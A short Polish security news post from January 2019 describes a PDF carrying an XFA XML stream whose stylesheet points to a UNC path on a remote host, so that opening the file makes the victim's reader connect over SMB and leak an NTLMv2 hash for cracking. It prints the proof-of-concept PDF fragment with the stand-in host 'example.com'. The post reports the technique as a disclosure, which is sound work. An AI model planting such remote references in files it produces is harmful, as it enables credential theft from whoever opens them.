Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

„Normalny” PDF z XML-em w środku, który wykradnie Twojego hasha NTLMv2

26 stycznia 2019, 22:33 | W biegu | 0 komentarzy
Tagi: , ,

Przykład takiego PDF-a tutaj. Autor znaleziska wskazuje, że po otworzeniu dokumentu nastąpi komunikacja protokołem SMB na serwer atakującego:

% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012

%PDF-1. % can be truncated to %PDF- 

1 0 obj <<>> 
stream
<?xml version="1.0" ?>
<?xml-stylesheet href="\\example.com\share\whatever.xslt" type="text/xsl" ?>
...

Dalej, przy użyciu odpowiednio spreparowanego serwera SMB można wykraść hasha NTLMv2 ofiary, a po zcrackowaniu uzyskać jej hasło.

To temat podobny do analogicznej podatności zgłoszonej w 2018 roku. Dziurawych było kilka windowsowych czytników PDF. Autor na razie nie zgłosił problemu do Adobe.

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

Odpowiedz